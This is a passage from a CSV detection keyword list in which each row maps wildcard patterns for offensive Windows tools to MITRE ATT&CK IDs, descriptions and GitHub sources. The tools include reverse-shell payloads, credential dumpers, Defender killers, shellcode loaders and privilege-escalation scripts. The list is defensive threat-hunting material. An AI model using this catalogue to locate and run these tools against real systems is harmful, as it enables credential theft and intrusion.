Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinBruteLogon.exe*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinBruteLogon.res*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinCreds.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*windapsearch --dc *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*windapsearch.py*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","1","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" +"*windapsearch_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*windapsearch_py2.py*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","1","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" +"*windapsearch-master*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","1","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" +"*WinDefenderKiller*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" +"*winDefKiller.exe*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" +"*WindfarmDynamite.cdproj*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*WindfarmDynamite.exe*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*WindfarmDynamite.sln*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*Windows Exploit*","offensive_tool_keyword","_","windows exploit keyword often used in poc exploit github repo or could be a file name or folder","T1068 - T1070 - T1071 - T1078 - T1085 - T1090 - T1105 - T1112 - T1134 - T1135 - T1136 - T1203 - T1210 - T1211 - T1218 - T1222 - T1247 - T1499 - T1505 - T1526 - T1547 - T1548 - T1550 - T1553 - T1574 - T1583 - T1584 - T1587 - T1588 - T1590 - T1591 - T1592 - T1596 - T1600","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*windows*lsa_secrets.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Windows.Hacktool.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*windows/c_payload_util*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Windows/lazagne.spec*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*windows/shell_reverse_tcp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*windows/x64/meterpreter_reverse_tcp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*windows_agent/asm/x64/alter_pe_sections*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_agent/asm/x86/alter_pe_sections*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_agent/dll_main.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_agent/exe_main.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_agent/win_*.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_agent/win_named_pipe.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_agent/win_shell.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_autologin.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*windows_console_interceptor*dll_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_console_interceptor*exe_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_console_interceptor*interceptor.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_credentials.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*windows_key.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*windows_recon.bat*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" +"*windows_sam_hivenightmare.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*windows_sam_hivenightmare.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*windows10_ntfs_crash_dos*","offensive_tool_keyword","POC","PoC for a NTFS crash that I discovered. in various Windows versions Type of issue: denial of service. One can generate blue-screen-of-death using a handcrafted NTFS image. This Denial of Service type of attack. can be driven from user mode. limited user account or Administrator. It can even crash the system if it is in locked state.","T1499.002 - T1059.001 - T1538.002","TA0002 - TA0007 - TA0008","N/A","N/A","DDOS","https://github.com/mtivadar/windows10_ntfs_crash_dos","1","1","N/A","N/A","6","589","137","2020-04-28T18:11:52Z","2018-04-27T19:31:59Z" +"*Windows7-BypassLogon-Screen.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*WindowsEnum -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-WinEnum.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*WindowsExploits*","offensive_tool_keyword","Exploits","A curated archive of complied and tested public Windows exploits.","T1213 - T1210 - T1188 - T1055","TA0001 - TA0009 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WindowsExploits/Exploits","1","1","N/A","N/A","10","1213","565","2020-05-29T19:09:52Z","2017-06-05T15:39:22Z" +"*windows-exploit-suggester.*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*windows-forkbomb.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*WindowsLies*BlockWindows*","offensive_tool_keyword","BlockWindows","Stop Windows 7 through 10 Nagging and Spying updates. Tasks. IPs. and services. Works with Windows 7 through 10","T1059 - T1562 - T1053 - T1543","TA0002 - TA0003 - TA0004 - TA0008","N/A","N/A","Defense Evasion","https://github.com/WindowsLies/BlockWindows","1","1","N/A","N/A","7","644","109","2020-04-11T15:38:12Z","2015-08-26T01:17:57Z" +"*Windows-Post-Exploitation*","offensive_tool_keyword","Windows-Post-Exploitation","Windows Post Exploitation list of tools on github. could also be related to folder name","T1021 - T1059 - T1078 - T1056 - T1028 - T1053 - T1003","TA0002 - TA0003 - TA0004 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/emilyanncr/Windows-Post-Exploitation","1","1","N/A","N/A","5","492","122","2021-09-20T01:47:13Z","2017-11-18T04:16:41Z" +"*windows-privesc-check*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" +"*Windows-Privilege-Escalation*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" +"*WindowsShareFinder.cs*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*winexec.notepad.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*WinhttpShellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*WinhttpShellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*WinhttpShellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*WinhttpShellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*Win-Ops-Master.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Winpayloads*","offensive_tool_keyword","Winpayloads","Undetectable Windows Payload Generation with extras Running on Python2.7","T1203 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/nccgroup/Winpayloads","1","1","N/A","N/A","10","1517","361","2022-11-08T08:14:23Z","2015-10-09T09:29:49Z" +"*winPEAS.bat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*winPEAS.bat*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*WinPEAS.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEAS.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*winPEAS.ps1*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" 